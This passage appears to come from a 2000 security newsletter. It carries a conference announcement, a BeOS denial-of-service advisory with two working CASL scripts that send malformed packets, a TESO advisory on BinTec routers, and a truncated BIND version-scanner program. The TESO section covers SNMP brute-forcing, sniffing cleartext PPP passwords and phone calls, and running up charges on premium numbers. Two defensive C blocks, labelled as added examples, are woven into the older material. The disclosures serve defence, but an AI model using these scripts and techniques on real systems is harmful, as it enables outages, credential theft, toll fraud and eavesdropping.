       The core00/CanSecWest conference will run on May 10-12, 2000*. The conference
       will be at the Robson Conference Center which is situated under the Vancouver
       Art Gallery next to the Law Court gardens in downtown Vancouver, BC, Canada.
      
        The seminar will be in an auditorium setting with live high-speed internet 
        access, and an adjoining lunch and display room. The center itself is situated 
        in the heart of downtown Vancouver, next to major hotels, shopping, Stanley 
        Park and several major transportation nexuses. Skiing or snowboarding at the 
        world-renowned Whistler resort is a 60 minute drive from downtown.
      
       Our objective is to pack the most comprehensive overview of security into 2.5 
       days we can. At the conclusion of this course attendees will leave with a 
       strong working base of critical security knowledge that can be applied to their 
       day-to-day work immediately.
      
      
      
      
      
      
                                                                   "The core00"
      
      
        The first day of introductory training will give the attendee the background on 
        terminology and technology to understand and effectively learn from the 
        security masters speaking during the second day.  The overall theme is similar 
        to a martial arts school: the first day is the basics and the second is notable 
        lectures from "Sensei".
      
      
      
       Noted speakers include:
      
       Ron Gula - Network Security Wizards 
      
            Famous ex-U.S. government computer security analyst, who founded Network 
            Security Wizards and authored the Dragon intrusion detection system. Ron 
            will discuss intrusion detection sensors, drawing upon his large base of 
            practical experience in the area. 
      
      
      
      
       Ken Williams - Ernst & Young
      
            The creator of famous hacker super-site: packetstorm.securify.com. The 
            infamous "tattooman" from genocide2600 now of Ernst&Young's security team 
            will give some pointers on NT security.
      
      
       Marty Roesch - www.hiverworld.com
      
            Author of the popular "snort" intrusion detection system and senior 
            software engineer on Hiverworld's "ARMOR" intrusion detection system. He 
            will talk about good ways to "snort" out intruders.
      
      
      
      
       rain.forest.puppy - www.wiretrip.net
      
            Famous security paper author - one of those "he could take over the 
            internet if he felt like it" kind of guys will amaze and amuse with some 0 
            day exploit training.
      
      
       Theo DeRaadt - OpenBSD
      
            The leader of the OpenBSD Secure operating system project will talk about 
            securing operating systems.
      
      
      
       Fyodor - www.insecure.org
      
            Author of the award winning Nmap Security Scanner.   He also maintains the 
            popular Insecure.Org web site, the "Exploit World" vulnerability database, 
            and several seminal papers describing techniques for stealth port scanning 
            and OS detection via TCP/IP stack fingerprinting.  Fyodor will demonstrate 
            the use of Nmap to identify subtle security vulnerabilities in a network. 
      
      
      
        Max Vision - www.maxvision.net - www.whitehats.com
      
            Security consultant  and author of the popular ArachNIDS 
            (www.whitehats.com) public intrusion signature database will discuss 
            intrusion forensics, attack fakes, attacker verification, and retaliation.
            
            
            (I thought Max was in trouble with the law ...? - Ed)
      
       Dragos Ruiu - dursec.com
      
            Tutorial author, founder of NETSentry Technology, former MPEG and ATM 
            expert for HP and dursec.com founder; Dragos will be giving the first 
            day's training.  Dragos has instructed tens of thousands of people about 
            digital video and high speed computer networks in highly rated HP training 
            courses delivered in over 60 cities world-wide. A long-time security 
            expert and instructor, his course material will explain this intricate 
            subject through approachable explanations with applications and real-world 
            examples that will help you apply this important knowledge to your 
            computers immediately.
            
            
      @HWA      
      
246.0 PSS:BeOs Network DoS
      ~~~~~~~~~~~~~~~~~~~~
      
      Sourced from Packetstorm
      http://packetstorm.securify.com/
      
       
      Problem:
        It is possible to crash the BeOS networking process.
      
      Discussion:
        The BeOS networking stack crashes when certain malformed packets
      are sent to it.  This document explains two such packets.  The
      first is an IP packet with the protocol field set to TCP.  If the
      IP length field is set to be shorter than 40, it will crash the
      networking process on reception.  Similarly, an IP packet with
      protocol field set to UDP with an IP length of less than 28 also
      crashes the stack.  The lengths 40 and 28 correspond with the
      minimum sizes of the IP and TCP headers, and the IP and UDP headers
      respectively.
      
         Because the networking stack is a separate process in BeOS, it may
       be easily restarted after it crashes.
      
        A bug report has been filed with Be and assigned the bug number of
      20000405-18674.  Be has marked the bug as "Will Not Fix" with the
      comment "The entire networking system will be replaced soon."
      
        This bug was found with the help of the ISIC utility by Mike Frantzen.
      
        Two CASL scripts which demonstrate the bug are listed below.
      
      References:
        http://www.be.com/  - Be's website.  BeOS is available for download
            free of charge.
      
        http://bebugs.be.com/devbugs/  - Be's bug tracking database.
      
        http://expert.cc.purdue.edu/~frantzen/ - The homepage of the
            ISIC author.
      
        ftp://ftp.nai.com/pub/security/casl/ - NAI's packet scripting
            language CASL is available for download free of charge.
      
      Script 1:
          #!/usr/local/casl/bin/casl
      
          #include "tcpip.casl"
          #include "packets.casl"
          #include "tcp.casl"
      
          srchost = 10.0.0.1;
          dsthost = 10.0.0.2;
      
          IPH = copy UDPIP;
      
          IPH.ip_hl = 5;
          IPH.ip_src = srchost;
          IPH.ip_dst = dsthost;
          IPH.ip_length = 27;
      
          packet = [ IPH ];
          ip_output(packet);
      
      Script 2:
          #!/usr/local/casl/bin/casl
      
          #include "tcpip.casl"
          #include "packets.casl"
          #include "tcp.casl"
      
          srchost = 10.0.0.1;
          dsthost = 10.0.0.2;
      
          IPH = copy TCPIP;
      
          IPH.ip_hl = 5;
          IPH.ip_src = srchost;
          IPH.ip_dst = dsthost;
          IPH.ip_length = 39;
      
          packet = [ IPH ];
          ip_output(packet);
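       The two thresholds in the discussion (ip_len below 40 with protocol TCP, below 28 with
       protocol UDP) are exactly what a receiving stack must enforce before it touches the
       transport header. The validator below is an added example, not code from the advisory
       or from Be: it checks an IPv4 packet's ip_len against the header sizes and, for
       reference, rebuilds the two trigger packets from the CASL scripts (10.0.0.1 to
       10.0.0.2, ip_hl 5) as constructed byte buffers.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Minimum header sizes behind the two thresholds in the advisory:
   20 (IPv4) + 20 (TCP) = 40 bytes, 20 (IPv4) + 8 (UDP) = 28 bytes. */
#define IPV4_MIN_HDR 20
#define TCP_MIN_HDR  20
#define UDP_MIN_HDR  8
#define PROTO_TCP    6
#define PROTO_UDP    17

enum ip_verdict {
    IP_OK = 0,
    IP_BAD_VERSION,  /* not an IPv4 packet */
    IP_TRUNCATED,    /* fewer bytes on the wire than the header claims */
    IP_SHORT_IHL,    /* header length field below the 5-word minimum */
    IP_SHORT_TOTAL,  /* total length smaller than the IP header itself */
    IP_SHORT_L4      /* total length leaves no room for the TCP/UDP header */
};

/* Validate an IPv4 packet of caplen bytes before touching any transport header.
   This is the check the affected stack lacked: it trusted ip_len and went on to
   read a TCP or UDP header that the packet did not actually contain. */
enum ip_verdict validate_ipv4(const uint8_t *pkt, size_t caplen)
{
    if (caplen < IPV4_MIN_HDR)
        return IP_TRUNCATED;
    if ((pkt[0] >> 4) != 4)
        return IP_BAD_VERSION;

    size_t  ihl   = (size_t)(pkt[0] & 0x0f) * 4;      /* header length in bytes */
    size_t  total = ((size_t)pkt[2] << 8) | pkt[3];    /* the ip_len field */
    uint8_t proto = pkt[9];

    if (ihl < IPV4_MIN_HDR)
        return IP_SHORT_IHL;
    if (total < ihl)
        return IP_SHORT_TOTAL;
    if (total > caplen)
        return IP_TRUNCATED;

    size_t l4_min = 0;                 /* other protocols: no fixed minimum here */
    if (proto == PROTO_TCP)
        l4_min = TCP_MIN_HDR;
    else if (proto == PROTO_UDP)
        l4_min = UDP_MIN_HDR;
    if (total < ihl + l4_min)
        return IP_SHORT_L4;
    return IP_OK;
}

/* Build a constructed 20-byte IPv4 header (no options, no payload) inside a
   zero-padded buffer, with the protocol and ip_len the CASL scripts use, and
   return the verdict. caplen plays the role of the frame length on the wire. */
enum ip_verdict verdict_for(uint8_t proto, uint16_t ip_len, size_t caplen)
{
    uint8_t buf[1500];
    if (caplen < IPV4_MIN_HDR || caplen > sizeof buf)
        return IP_TRUNCATED;
    memset(buf, 0, sizeof buf);
    buf[0] = 0x45;                     /* version 4, ihl 5 (IPH.ip_hl = 5) */
    buf[2] = (uint8_t)(ip_len >> 8);
    buf[3] = (uint8_t)(ip_len & 0xff);
    buf[8] = 64;                       /* ttl */
    buf[9] = proto;
    buf[12] = 10; buf[15] = 1;         /* 10.0.0.1, as in the scripts */
    buf[16] = 10; buf[19] = 2;         /* 10.0.0.2 */
    return validate_ipv4(buf, caplen);
}

int main(void)
{
    /* the two trigger packets from the scripts, then their smallest valid forms */
    printf("UDP, ip_len 27: %d (IP_SHORT_L4 is %d)\n", verdict_for(PROTO_UDP, 27, 60), IP_SHORT_L4);
    printf("TCP, ip_len 39: %d (IP_SHORT_L4 is %d)\n", verdict_for(PROTO_TCP, 39, 60), IP_SHORT_L4);
    printf("UDP, ip_len 28: %d (IP_OK is %d)\n", verdict_for(PROTO_UDP, 28, 60), IP_OK);
    printf("TCP, ip_len 40: %d (IP_OK is %d)\n", verdict_for(PROTO_TCP, 40, 60), IP_OK);
    return 0;
}
```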
      
      
      @HWA      
      
247.0 PSS: TESO Security Advisory BinTec router weakness
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Sourced from Packetstorm
      http://packetstorm.securify.com/
     
      
      
      
      
      - ------
      
      TESO Security Advisory
      2000/03/30
      
      BinTec router security and privacy weakness
      
      
      Summary
      ===================
      
           By using SNMP brute-force techniques on SNMP community names one is able
           to gain the management accounts' passwords, which are the same as the SNMP
           community names.
           Additionally the MIB tree holds security-related information which should
           not be accessible through read-only SNMP. These routers also offer services
           which can be abused rather easily, like dialing out and getting full line
           access via a CAPI interface, or a debugging interface which gives you all
           information which is sent over the BRI lines.
           (Those services are open by default and the debugging service is barely
           documented.)
      
      
      Systems Affected
      ===================
      
          BinTec ISDN router family
      
          tested: BIANCA/BRICK-XL
                  BIANCA/BRICK-XS
      
      
      Tests
      ===================
      
      
          (1) Example system setup for examples given
          ___________________________________________________________________________
      
      
          admin Login Password/SNMP Community  bitkoenig
          read  Login Password/SNMP Community  rince
          write Login Password/SNMP Community  guenthi
      
          defaults are: admin/bintec read/public and write/public
      
      
          (2) Example of Read-Only SNMP output from a BinTec router
          ___________________________________________________________________________
      
      
          syslog:
          bitch:~$ snmpwalk fefe.rookie.lan rince .1.3.6.1.4.1.272.4.1.12.1
          [...]
          enterprises.272.4.1.12.1.4.954440111.7.39 = "citykom-muenster:
           local IP address is 195.202.40.124, remote is 195.202.32.121"
          enterprises.272.4.1.12.1.4.954440116.7.40 =
           "LOGOUT as admin from TELNET 192.168.0.100 at Thu Mar 30 18:15:16 2000"
          enterprises.272.4.1.12.1.4.954440685.7.41 =
           "LOGIN as admin from TELNET 192.168.0.100 at Thu Mar 30 18:24:45 2000"
          enterprises.272.4.1.12.1.4.954440692.7.42 =
           "citykom-muenster: outgoing connection closed, duration 583 sec, 18194
            bytes received, 4934 bytes sent, 6 charging units, 0 charging amounts"
          enterprises.272.4.1.12.1.4.954440692.7.43 =
           "ISDN: 30.03.2000,18:15:08,18:24:52,583,18596,5306,134,124,6 Units,O,,
            609910,7/0,0,0B,citykom-muenster"
          [...]
      
          capi-user-db:
          bitch:~$ snmpwalk fefe.rookie.lan rince .1.3.6.1.4.1.272.4.7.8.1
          enterprises.272.4.7.8.1.1.7.100.101.102.97.117.108.116.0 = "default"
           /* username */
          enterprises.272.4.7.8.1.2.7.100.101.102.97.117.108.116.0 = ""
           /* password */
          enterprises.272.4.7.8.1.6.7.100.101.102.97.117.108.116.0 = 1
           /* capi access activated */
      
      
          (3) Remote CAPI Server on a BinTec router
          ___________________________________________________________________________
      
       
          fefe:> ps -elf
          [...]
          S     0    26     1  28        0   Jan  1 ?        00:00 00:00 vcapid
          [...]
      
          Corresponding Port:
          
          bitch:~# nmap -sS -O -p 6000 poor.brick.de
      
          Starting nmap V.3.01beta by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
          Interesting ports on poor.brick.de (xxx.xxx.xxx.xxx):
          Port    State       Protocol  Service
          6000    open        tcp        X11
      
          TCP Sequence Prediction: Class=random positive increments
                              Difficulty=1894 (Medium)
      
          Remote operating system guess:
          Bintec Brick XS SW Release 4.9.1 ISDN access router
      
          Nmap run completed -- 1 IP address (1 host up) scanned in 8 seconds
      
      
          (4) BrickTrace Server on a BinTec router:
          ___________________________________________________________________________
      
      
          fefe:> ps -elf
          [...]
          S     0    24     1  28        0   Jan  1 ?        00:04 00:01 traced
          [...]
      
          Corresponding Port:
      
          bitch:~# nmap -sS -O -p 7000 poor.brick.de
      
          Starting nmap V.3.01beta by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
          Interesting ports on poor.brick.de (xxx.xxx.xxx.xxx):
          Port    State       Protocol  Service
          6000    open        tcp        afs3-fileserver
      
          TCP Sequence Prediction: Class=random positive increments
                              Difficulty=1894 (Medium)
      
          Remote operating system guess:
          Bintec Brick XS SW Release 4.9.1 ISDN access router
      
          Nmap run completed -- 1 IP address (1 host up) scanned in 6 seconds
      
      
          (5) BrickTracing a password from an outgoing PPP connection
          ___________________________________________________________________________
      
      
          bitch:~$ bricktrace -h2pi 1 0 2
          bricktrace: Connected to 192.168.0.1(7000)
          Tracing: Channel 1 Unit 0 Slot 2          /* Tracing the B-Channel */
          [...]
          020721.320 X DATA[0025]
                0000: ff 03 c0 23 01 01 00 15  08 73 68 6f 6c 74 77 69  ...#.....user
                0010: 73 07 72 65 74 68 6f 6f  6f                       .password
                   PPP packet protocol 0xc023 (PAP)
                   ID 1 PAP Authenticate-Request Peer-ID user Password password
              A=FF  UI
          [...]
      
      
          (6) Snooping an S0 Bus for telephone calls
          ___________________________________________________________________________
      
      
          bitch:~$ bricktrace -h3 0 0 2
          bricktrace: Connected to 192.168.0.1(7000)
          Tracing: Channel 0 Unit 0 Slot 2        /* Tracing the D-Channel */
          [...]
          021096.656 R DATA[0015]
                0000: 02 b3 10 1a 08 01 81 0d  18 01 89 1e 02 82 88 ...............
                  PD=08 Dest CR=01  SETUP ACKNOWLEDGE
                      IE-Element  : Channel Identification :
                                    Interface implicitly identified
                                    Interface type S0
                                    Channelnumber is exclusive (accept only this)
                                    Identified Channel is not D-Channel
                                    Selected Channel : B1-Channel
                      IE-Element  : Progress Indicator reports
                                    In-band information now available
          [...]
          021105.366 R DATA[0008]
                0000: 02 b3 12 2e 08 01 81 02                           ........
                  PD=08 Dest CR=01  CALL PROCEEDING
          021108.076 R DATA[0012]
                0000: 02 b3 14 2e 08 01 81 01  1e 02 82 88              ............
                  PD=08 Dest CR=01  ALERT
                      IE-Element  : Progress Indicator reports
                                    In-band information now available
          [...]
          021124.748 R DATA[0028]
                0000: 02 b3 16 2e 08 01 81 07  29 05 00 03 1e 12 23 4c  ........).....#L
                0010: 0b 21 83 31 33 30 31 31  32 31 31 32              .!.130112112
                  PD=08 Dest CR=01  CONNECT
                      IE-Element  : Date yy.mm.dd-hh:mm : 0.3.30-18:35:134597435
                      IE-Element  : Unknown IE-Element 0x4c in Codeset 0
         [...]
         021130.282 R DATA[0045]
               0000: 02 b3 1a 32 08 01 81 4d  1c 16 91 a1 13 02 02 c4   ...2...M........
               0010: 37 02 01 22 30 0a a1 05  30 03 02 01 00 82 01 01   7.."0...0.......
               0020: 28 0b 30 20 45 69 6e 68  65 69 74 65 6e            (.0 Einheiten
                  PD=08 Dest CR=01  RELEASE
                      IE-Element  : Facility
                                    Service discriminator is supplement. application
                                    Component tag is invoke
                                      integer (0x2)
                                      50231
                                      integer (0x1)
                                      34
                                      sequence (0xa)
                                      {
                                          GetNextRequest (0x5)
                                          {
                                              sequence (0x3)
                                              {
                                                  integer (0x1)
                                                  0
                                              }
                                          }
                                          GetResponse (0x1)
      
                                      }
      
      
                      IE-Element  : Display                : 0 Einheiten
         [...]
      
      
          (7) Checking line status from BinTec's httpd:
          ___________________________________________________________________________
      
       
          [...]
          Hardware Interfaces
       
          Slot 1 Ethernet o.k.
          Slot 2 ISDN S2M o.k. used 13, available 17
          - - X X X X X - X -
          - - X - X - - X - -
          X - - - X - - X - X
          [...]
         
          now we know what to sniff:
          sniffing an inbound ppp connection on line 4 slot 2:
       
          bitch:~$ bricktrace -h2pit 4 0 2
          bricktrace: Connected to aaa.bbb.ccc.ddd(7000)
          Tracing: Channel 4 Unit 0 Slot 2
          [...]
          004419.999 X DATA[0045]
                0000: 21 45 00 00 2c 39 07 40  00 3e 06 f5 cc c2 61 44 !E..,9.@.>....aD
                0010: 0d c2 61 45 28 00 50 da  79 bc f8 a9 a7 02 2b c5 ..aE(.P.y.....+.
                0020: 7a 60 12 44 70 3c                                z.Dp<
                    Compressed PPP packet protocol 0x21 (TCP/IP)
               A=21  RNR  P/F=0 N(R)=2
       
                    IP-Packet from aaa.bbb.ccc.ddd to a.b.c.d  protocol 0x6
                    TCP-Message, sourceport 80 destinationport 55929
                                 sequence number 3170412967
                                 acknowledgement number 36423034
                                 offset 6 flags ACK SYN
                                 window 17520 checksum 0x3c9e urgent 0
          [...] 
          004420.640 R DATA[0609]
                0000: 2d 70 0e b0 43 ff 47 45  54 20 68 74 74 70 3a 2f  -p..C.GET http:/
                0010: 2f 63 68 61 74 33 2e 70  6c 61 79 67 72 6f 75 6e /chat3.playgroun
                0020: 64 2e 64 65 2f 63                                 d.de/c
                    Compressed PPP packet protocol 0x2d (VJ Compressed TCP/IP)
               A=2D  I    P/F=1 N(R)=3 N(S)=0
                       0E B0 C  FF G  E  T     h  t  t  p  :  /  /  c  h  a  t  3
                          .  p  l  a  y  g  r  o  u  n  d  .  d  e  /  c  h  a  t
                    IP-Packet from a to b protocol 0x2f
          [...]
         
       
      Impact
      ===================
      
      
          (1) SNMP communities / login passwords
          ___________________________________________________________________________
      
           By using standard brute-force methods, the SNMP community string, and
           therefore the login passwords, can be obtained. A program doing this
           is for example ADMsnmp, which has to be fed with a wordlist. Bruteforcing
           this way is quite effective; you get about 500-1000 words per minute
           (which of course depends on your and the router's connectivity). You can get
           this program from [4]. Bruteforcing the passwords directly via telnet isn't
           possible because the router slows down after approx. 6 tries.
      
      
          (2) Using the CAPI facility
          ___________________________________________________________________________
       
           Nearly any router can remotely be used as an 'ISDN line provider' - you can
           use the BRI lines of the router if they are not password protected.
           While doing a short survey most machines we encountered proved
           to be vulnerable, that is, they didn't have any restrictions set. The CAPI
           daemon listens on port 6000 as you can see in the 'Tests' section.
           This feature can, for example, be exploited by dialing expensive numbers
           (0900 or 0190 [in DE] lines). You may also hide your real identity by
           calling a 'call-by-call' ISP who gives you another IP you can deal with.
           A (R)CAPI library for Un*x exists, which can be used for these attacks.
           It is available via [5]. There is also a CAPI user interface for MS Windows,
           which is called Brickware and can be obtained via [6].
           Firmware before 5.1.x seems to be generally not passworded; we have not 
           checked 5.1.x yet.
      
      
          (3) Using BrickTrace for snooping BRI-Lines
          ___________________________________________________________________________
      
           You can gain information about the ISP or corporation running these routers
           with open BrickTrace ports (port 7000, default) with a program called
           bricktrace, which is available via [7]. In the documentation this
           port isn't even stated (!). See 'Solution' for how to turn off this port.
           As you can see the whole data passing the line, you also get the users'
           passwords and see what they do on the net (it is in a way like a dedicated
           sniffer). Using this technique of sniffing you may also see private
           information of corporations, not only restricting you to Internet
           traffic but also to 'intranet' lines that use the same router, as well
           as telephony networks (S0 bus).
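       The trace in Test (5) gives up a credential because PAP (RFC 1334) carries Peer-ID
       and password as plain length-prefixed strings inside the Authenticate-Request. The
       decoder below is an added example, not part of the TESO advisory or of BinTec's
       tools: it classifies an HDLC-framed PPP frame of the form bricktrace shows and, for
       PAP, records the fields a trace exposes, so an operator reviewing a line trace can
       confirm the dial-in uses CHAP (protocol 0xc223, which carries only a
       challenge/response hash) rather than PAP. The sample frames are constructed
       ("user"/"password"), not the bytes from the advisory.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define PPP_PROTO_PAP    0xc023   /* Password Authentication Protocol, RFC 1334 */
#define PPP_PROTO_CHAP   0xc223   /* Challenge-Handshake Authentication Protocol, RFC 1994 */
#define PAP_AUTH_REQUEST 1        /* the only PAP code that carries the secret */

enum auth_kind {
    AUTH_OTHER = 0,        /* not an authentication frame (LCP, IPCP, IP, ...) */
    AUTH_CHAP,             /* challenge/response only: no secret on the line */
    AUTH_PAP_CLEARTEXT,    /* PAP in use: an Authenticate-Request exposes the credential */
    AUTH_MALFORMED         /* lengths do not add up: trust no field */
};

struct pap_request {
    uint8_t id;
    char    peer_id[256];  /* Peer-ID has a one-byte length, so at most 255 bytes */
    size_t  peer_id_len;
    size_t  password_len;  /* only the length is kept; the password bytes are not copied */
};

/* Classify one HDLC-framed PPP frame (ff 03 <proto> ...), the form bricktrace
   shows, and for a PAP Authenticate-Request record the fields a trace exposes. */
enum auth_kind classify_ppp_auth(const uint8_t *f, size_t n, struct pap_request *out)
{
    if (out)
        memset(out, 0, sizeof *out);
    if (n < 4 || f[0] != 0xff || f[1] != 0x03)
        return AUTH_MALFORMED;
    uint16_t proto = ((uint16_t)f[2] << 8) | f[3];
    if (proto == PPP_PROTO_CHAP)
        return AUTH_CHAP;
    if (proto != PPP_PROTO_PAP)
        return AUTH_OTHER;
    /* PAP header: code(1) id(1) length(2); length covers these four bytes too */
    const uint8_t *p = f + 4;
    size_t left = n - 4;
    if (left < 4)
        return AUTH_MALFORMED;
    uint16_t plen = ((uint16_t)p[2] << 8) | p[3];
    if (plen < 4 || plen > left)
        return AUTH_MALFORMED;
    if (p[0] != PAP_AUTH_REQUEST)
        return AUTH_PAP_CLEARTEXT;   /* Ack/Nak carry no secret, but the link still uses PAP */
    const uint8_t *q = p + 4, *end = p + plen;
    if (q >= end)
        return AUTH_MALFORMED;
    size_t idlen = *q++;
    if (idlen > (size_t)(end - q))
        return AUTH_MALFORMED;
    if (out) {
        out->id = p[1];
        memcpy(out->peer_id, q, idlen);
        out->peer_id[idlen] = '\0';
        out->peer_id_len = idlen;
    }
    q += idlen;
    if (q >= end)
        return AUTH_MALFORMED;
    size_t pwlen = *q++;
    if (pwlen > (size_t)(end - q))
        return AUTH_MALFORMED;
    if (out)
        out->password_len = pwlen;
    return AUTH_PAP_CLEARTEXT;
}

/* Constructed sample frames; these are not the bytes from the advisory's trace. */
static const uint8_t pap_frame[] = {
    0xff, 0x03, 0xc0, 0x23,                         /* HDLC addr/ctrl, protocol PAP */
    0x01, 0x01, 0x00, 0x12,                         /* Authenticate-Request, id 1, length 18 */
    0x04, 'u', 's', 'e', 'r',                       /* Peer-ID "user" */
    0x08, 'p', 'a', 's', 's', 'w', 'o', 'r', 'd'    /* password "password", in the clear */
};
static const uint8_t chap_frame[] = {
    0xff, 0x03, 0xc2, 0x23,                         /* protocol CHAP */
    0x01, 0x01, 0x00, 0x09, 0x04, 0xde, 0xad, 0xbe, 0xef  /* Challenge, id 1, 4-byte value */
};
static struct pap_request last;

enum auth_kind demo_pap(void)  { return classify_ppp_auth(pap_frame, sizeof pap_frame, &last); }
enum auth_kind demo_chap(void) { return classify_ppp_auth(chap_frame, sizeof chap_frame, NULL); }
const char *demo_pap_peer_id(void) { demo_pap(); return last.peer_id; }
size_t demo_pap_password_len(void) { demo_pap(); return last.password_len; }

int main(void)
{
    if (demo_pap() == AUTH_PAP_CLEARTEXT)
        printf("PAP id %u: peer-id \"%s\", %zu-byte password sent in the clear\n",
               last.id, last.peer_id, last.password_len);
    printf("CHAP frame: %d (AUTH_CHAP is %d)\n", demo_chap(), AUTH_CHAP);
    return 0;
}
```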
      
       
      Explanation
      ===================
      
           BinTec Communications seems to rely on security by obscurity. Neither the
           severity of these services, nor how to configure them, is mentioned
           properly in their documentation.
           However, BinTec routers *can* be secured; it just seems not to be common
           knowledge.
           In addition to this, it seems to be quite useless to provide RCAPI
           facilities on a router which is mainly used for dial-in purposes. If one
           needs those abilities, encrypted management access would be appropriate.
      
      
      Solution
      ===================
      
          SNMP: disable (admin.biboAdmSnmpPort=0)
                        (admin.biboAdmSnmpTrapPort=0)
      
          RCAPI: disable or password protect
                        (admin.biboAdmCapiTcpPort=0)
      
          BrickTrace: disable
                        (admin.biboAdmTraceTcpPort=0)
      
           Just manage your router through the serial line, because if your connection
           gets sniffed, these services can be reactivated.
       
      
      Acknowledgments
      ================
      
           The bug discovery and the demonstration are due to Stephan Holtwisch [2].
           This advisory has been written by Stephan 'rookie' Holtwisch and hendy.
      
      
      Contact Information
      ===================
      
          The TESO crew can be reached by mailing to teso@coredump.cx.
          Our web page is at [1].
      
      
      References
      ===================
      
          [1] TESO
              http://teso.scene.at/ or https://teso.scene.at/
      
          [2] Stephan Holtwisch
              sholtwis@muenster.de
      
          [3] BinTec Communications
              http://www.bintec.de
      
          [4] ADMsnmp - bruteforce SNMP communities
              ftp://adm.freelsd.net/pub/ADM/ADMsnmp.0.1.tgz
      
          [5] libcapi for RCAPI (Unix)
              ftp://ftp.bintec.de/pub/brick/libcapi/
      
          [6] BrickWare (CAPI software for windows)
              ftp://ftp.bintec.de/pub/brick/brickware/
      
          [7] BrickTrace (BRI-Line snooping)
              ftp://ftp.bintec.de/pub/brick/unixtool/
      
      
      Disclaimer
      ===================
      
          This advisory does not claim to be complete or to be usable for any
          purpose. Especially information on the vulnerable systems may be
          inaccurate or wrong. The supplied information is not to be used for
          malicious purposes, but for educational purposes only.
      
          This advisory is free for open distribution in unmodified form.
          Articles that are based on information from this advisory should include
          at least links [1] and [2].
      
      - ------
      
      
      @HWA      
      
248.0  b0f: namedscan.c
       ~~~~~~~~~~~~~~~~


       /*************************************************/
       /* namedscan.c will check the named version      */
       /* of a host, and tell you if it's a vuln version */
       /*************************************************/
       /* buffer0verfl0w security */
       
       /*******************************/
       /* coded by eth0 from b0f      */
       /* [http://www.b0f.com]        */
       /*******************************/
      #include <stdio.h>
      #include <stdlib.h>
      #include <unistd.h>
      #include <string.h>
      #include <sys/types.h>
      #include <sys/socket.h>
      #include <sys/time.h>
      #include <sys/stat.h>
      #include <netinet/in.h>
      #include <netdb.h>
      #include <fcntl.h>
      #include <errno.h> 
      #include <signal.h>
      #include <time.h>
      #include <stdarg.h>
      #include <ctype.h>   
      #include <arpa/inet.h>
      #include <arpa/nameser.h>
      
      
      
      
      
      
      int lookup_host(struct sockaddr_in *ra, char *hn, unsigned short rp);
      void probe_bind(struct sockaddr_in ra);
      int talk(int sd, char *pkt, int pktl, char opc);
      int make_keypkt(char *pktbuf, char opc);
      void print_ver(char *host, int vul, char *buf);
      void handle_alarm(int signum);
      
      int
      lookup_host(ra, hn, rp)
         struct sockaddr_in *ra;
         char *hn;
         unsigned short rp;
      {
         struct hostent *he;
      
         ra->sin_family = AF_INET;
         ra->sin_port = htons(rp);
         if ((ra->sin_addr.s_addr = inet_addr(hn)) != -1)
            return 1;
         if ((he = gethostbyname(hn)) != (struct hostent *)NULL)
           {
              memcpy(&ra->sin_addr.s_addr, he->h_addr, 4);
              return 1;
           }
         herror("Unable to resolve hostname");
         return 0;
      }
      
      
      
      void
      probe_bind(ra)
         struct sockaddr_in ra;
      {
         int sd;
         char iquery[512], vquery[512], rname[256];
         struct hostent *he;
         HEADER *dh = (HEADER *)iquery;
      
         memset(vquery, 0, sizeof(vquery));
         memset(iquery, 0, sizeof(iquery));
         if (((sd = socket(AF_INET, SOCK_DGRAM, 0)) == -1) ||
             (connect(sd, (struct sockaddr *)&ra, sizeof(ra)) == -1))
           {
              perror("Unable to connect");
              if (sd != -1)
                 close(sd);
              return;
           }
          if ((he = gethostbyaddr((char *)&ra.sin_addr, sizeof(ra.sin_addr), AF_INET)) == (struct hostent *)NULL)
             sprintf(rname, "%s", inet_ntoa(ra.sin_addr));
          else
            {
               /* strncpy does not NUL-terminate when h_name fills the buffer; do it ourselves */
               strncpy(rname, he->h_name, sizeof(rname) - 1);
               rname[sizeof(rname) - 1] = '\0';
            }
      
         if (!talk(sd, iquery, sizeof(iquery), IQUERY))
            return;
         if (!talk(sd, vquery, sizeof(vquery), QUERY))
            return;
         close(sd);
      
         /* if dh->rcode == 0, then our iquery request was answered and the remote server
            supports iquery */
         print_ver(rname, dh->rcode == 0, vquery);
      }
      
      /*
       * write our packet from pkt, wait for a response and put it in pkt.
       * if the alarm goes off or the read fails, we print error
       * and return 0.  otherwise, our response packet is in pkt and we return 1.
       */
      int
      talk(sd, pkt, pktl, opc)
         int sd, pktl;
         char *pkt, opc;
      {
         int pktlen;
      
         pktlen = make_keypkt(pkt, opc);
          /* write() returns -1 on error, so a plain !write() would miss failures */
          if (write(sd, pkt, pktlen) != pktlen)
           {
              perror("write failed");
              close(sd);
              return 0;
           }
      /* #ifdef DEBUG
         printf("write() success\n");
      #endif */
         siginterrupt(SIGALRM, 1);
         signal(SIGALRM, handle_alarm);
         alarm(3);
         pktlen = read(sd, pkt, pktl);
         if (pktlen <= 0)
           {
              if (errno == EINTR)
                 errno = ETIMEDOUT;
              perror("<[Namedscan]>:([ Read Failed *shrugs* ]) -> read failed");
              close(sd);
              return 0;
           }
      /* #ifdef DEBUG
         printf("read success\n");
      #endif */
         alarm(0);
         return 1;
      }
      
      
      
      int
      make_keypkt(pktbuf, opc)
         char *pktbuf;
         char opc;
      {
         HEADER *dnsh;
         char *ptr = pktbuf;
         int pktlen = 0;
      
         dnsh = (HEADER *) ptr;
         /* fill out the parts of the DNS header that aren't 0 */
         dnsh->id = htons(rand() % 65535);
         dnsh->opcode = opc;
         dnsh->rd = 1;
         dnsh->ra = 1;
         /* one answer for IQUERY, one question for QUERY */
         if (opc == IQUERY)
            dnsh->ancount = htons(1);
         else if (opc == QUERY)
            dnsh->qdcount = htons(1);
         pktlen += sizeof(HEADER);
         ptr += sizeof(HEADER);
      
         /* we have to make a QUERY, fill out the question section */
         if (opc == QUERY)
           {
              /* version.bind. == elite */
              char qstr[] = "\007version\004bind\000";
              int qlen = strlen(qstr) + 1;
      
              memcpy(ptr, qstr, qlen);
              ptr += qlen;
              pktlen += qlen;
              PUTSHORT(T_TXT, ptr);
              PUTSHORT(C_CHAOS, ptr);
              pktlen += sizeof(short) * 2;
           }
         /* add a resource record for the inverse query */
         else if (opc == IQUERY)
           {
              unsigned long addr = inet_addr("1.2.3.4");
              unsigned long ttl = 31337;
              unsigned short addrlen = 4;
      
              *(ptr++) = '\0';
              pktlen++;
              PUTSHORT(T_A, ptr);
